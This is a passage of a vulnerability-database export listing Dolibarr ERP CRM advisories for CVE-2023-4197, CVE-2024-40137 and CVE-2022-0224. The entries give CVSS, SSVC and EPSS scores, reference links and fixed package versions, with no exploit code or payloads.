reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-05T19:57:10Z/
url https://github.com/Dolibarr/dolibarr/commit/0ed6a63fb06be88be5a4f8bcdee83185eee4087e
3
reference_url https://starlabs.sg/advisories/23/23-4197
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-05T19:57:10Z/
url https://starlabs.sg/advisories/23/23-4197
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-4197
reference_id CVE-2023-4197
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-4197
5
reference_url https://github.com/advisories/GHSA-r9cm-pw9j-3fpx
reference_id GHSA-r9cm-pw9j-3fpx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r9cm-pw9j-3fpx
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@18.0.2
purl pkg:composer/dolibarr/dolibarr@18.0.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.2
aliases CVE-2023-4197, GHSA-r9cm-pw9j-3fpx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vwxd-syyk-jueh
28
url VCID-w7ww-nq62-e7b1
vulnerability_id VCID-w7ww-nq62-e7b1
summary
Dolibarr ERP CRM vulnerable to remote code execution (RCE)
Dolibarr ERP CRM before 19.0.2 was discovered to contain a remote code execution (RCE) vulnerability via the Computed field parameter under the Users Module Setup function.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-40137
reference_id
reference_type
scores
0
value 0.0048
scoring_system epss
scoring_elements 0.65465
published_at 2026-06-07T12:55:00Z
1
value 0.0048
scoring_system epss
scoring_elements 0.65477
published_at 2026-06-06T12:55:00Z
2
value 0.0048
scoring_system epss
scoring_elements 0.65466
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-40137
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N
1
value 7.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137
reference_id CVE-2024-40137
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N
1
value 7.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-25T16:09:38Z/
url https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-40137
reference_id CVE-2024-40137
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N
1
value 7.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-40137
4
reference_url https://github.com/advisories/GHSA-vprp-94p9-5jp8
reference_id GHSA-vprp-94p9-5jp8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vprp-94p9-5jp8
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@19.0.2
purl pkg:composer/dolibarr/dolibarr@19.0.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2
aliases CVE-2024-40137, GHSA-vprp-94p9-5jp8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w7ww-nq62-e7b1
29
url VCID-z1ty-xypd-t3ct
vulnerability_id VCID-z1ty-xypd-t3ct
summary
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
dolibarr is vulnerable to Improper Neutralization of Special Elements used in an SQL Command
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0224
reference_id
reference_type
scores
0
value 0.00515
scoring_system epss
scoring_elements 0.67021
published_at 2026-06-06T12:55:00Z
1
value 0.00515
scoring_system epss
scoring_elements 0.67005
published_at 2026-06-07T12:55:00Z
2
value 0.00515
scoring_system epss
scoring_elements 0.66972
published_at 2026-06-04T12:55:00Z
3
value 0.00515
scoring_system epss
scoring_elements 0.67012
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0224
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79
3
reference_url https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0224
reference_id CVE-2022-0224
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0224
5
reference_url https://github.com/advisories/GHSA-j545-frh3-r9gq
reference_id GHSA-j545-frh3-r9gq
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j545-frh3-r9gq
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@15.0.0
purl pkg:composer/dolibarr/dolibarr@15.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1225-a2a6-bkan
1
vulnerability VCID-1uje-n8xc-y7b7
2
vulnerability VCID-3xdg-az5a-dyft
3
vulnerability VCID-4c2v-phxx-y3h8
4
vulnerability VCID-6drz-jsq4-wyhd
5
vulnerability VCID-7ku4-fwqc-33ba
6
vulnerability VCID-7qjh-teat-tqav
7
vulnerability VCID-8fjr-6hdm-vqdd
8
vulnerability VCID-d4uk-4adf-mba9
9
vulnerability VCID-egxz-r3nw-xffm
10
vulnerability VCID-ewrf-wdsh-kqgs
11
vulnerability VCID-f122-u34a-kfcm
12
vulnerability VCID-htgn-37m4-c7fu
13
vulnerability VCID-j345-dk2c-yfds
14
vulnerability VCID-jbkd-su9m-3udy
15
vulnerability VCID-k9nc-tze6-k7bx
16
vulnerability VCID-mpmz-eh21-nkcm
17
vulnerability VCID-pfyf-s4fc-d3a8
18
vulnerability VCID-rqux-jkta-4kfj
19
vulnerability VCID-s3xn-47cy-eucf
20
vulnerability VCID-srth-2stq-gyaq
21
vulnerability VCID-tmv2-39y8-f7f1
22
vulnerability VCID-tsbf-m4eq-gbgp
23
vulnerability VCID-vp4z-qpc7-uug1
24
vulnerability VCID-vwxd-syyk-jueh
25
vulnerability VCID-w7ww-nq62-e7b1
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0
aliases CVE-2022-0224, GHSA-j545-frh3-r9gq
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-z1ty-xypd-t3ct
Fixing_vulnerabilities
Risk_score 10.0
Resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.5